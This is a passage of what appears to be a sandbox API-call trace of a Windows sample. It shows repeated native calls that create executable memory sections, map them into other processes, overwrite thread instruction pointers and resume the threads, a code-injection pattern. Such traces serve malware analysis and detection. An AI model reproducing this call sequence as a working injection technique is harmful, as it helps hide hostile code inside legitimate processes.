[468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0168.863] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0168.863] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x14c200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x14d000) returned 0x0 [0168.879] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x14c200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0xbb0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x14d000) returned 0x0 [0168.950] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0168.965] NtClose (Handle=0x140) returned 0x0 [0168.966] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x281000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0xc69707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0168.977] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0168.977] NtClose (Handle=0x138) returned 0x0 [0168.977] NtClose (Handle=0xb4) returned 0x0 [0168.979] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0xed0, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0168.979] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0168.979] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0168.979] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x20c000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0168.980] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0168.983] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0xec) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0168.983] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0168.984] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x20c0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0168.997] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x20c000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0169.001] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0169.001] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x155200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x156000) returned 0x0 [0169.016] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x155200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2a90000, SectionOffset=0x0, ViewSize=0xde6e8*=0x156000) returned 0x0 [0169.063] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0169.080] NtClose (Handle=0x140) returned 0x0 [0169.080] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x20c000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2b52707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, 